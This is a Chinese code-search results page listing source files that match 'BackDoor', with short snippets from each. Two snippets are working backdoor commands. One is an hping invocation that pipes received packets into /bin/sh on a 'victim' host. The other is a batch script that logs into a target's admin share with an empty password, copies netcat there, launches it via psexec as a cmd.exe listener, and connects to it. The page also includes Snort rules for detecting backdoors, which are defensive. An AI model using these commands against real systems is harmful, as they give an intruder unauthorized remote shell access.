代码搜索:BackDoor
找到约 296 项符合「BackDoor」的源代码
代码结果 296
www.eeworm.com/read/146972/5734089
as-backdoor
hping can be used as a backdoor. Just try the -9 (--listen) option
and put in pipe with /bin/sh:
Put hping in listen mode in the victim host.
victim# hping -I eth0 -9 mysign | /bin/sh
Every packet
www.eeworm.com/read/390893/8435388
h backdoor.h
/*
* ---------------------------------------------------------------------
* ____ _ _ _____
* | _ \| | | | / ____|
*
www.eeworm.com/read/384729/8848194
rules backdoor.rules
# (C) Copyright 2001, Martin Roesch, Brian Caswell, et al. All rights reserved.
# $Id: backdoor.rules,v 1.1 2002/08/12 11:42:07 scara Exp $
#---------------
# BACKDOOR RULES
#---------------
#
alert
www.eeworm.com/read/281357/9160050
backdoor-lib
# $Id: backdoor-lib,v 1.3 2000/11/18 08:25:04 roesch Exp $
# backdoors (Back Orifice, etc) go here
# port 1524 (ingreslock) is pretty popular for setting up backdoor rootshells
alert tcp $EXTER
www.eeworm.com/read/378503/9227952
backdoor-lib
# $Id: backdoor-lib,v 1.3 2000/11/18 08:25:04 roesch Exp $
# backdoors (Back Orifice, etc) go here
# port 1524 (ingreslock) is pretty popular for setting up backdoor rootshells
alert tcp $EXTER
www.eeworm.com/read/166096/10035635
backdoor-lib
# $Id: backdoor-lib,v 1.3 2000/11/18 08:25:04 roesch Exp $
# backdoors (Back Orifice, etc) go here
# port 1524 (ingreslock) is pretty popular for setting up backdoor rootshells
alert tcp $EXTER
www.eeworm.com/read/160546/10519711
bat backdoor.bat
@echo off
net use \\%1\ipc$ "" /user:"administrator"
copy %windir%\system32\nc.exe \\%1\admin$\system32
psexec \\%1 -s -d nc -d -L -p 7621 -e cmd.exe
telnet %1 7621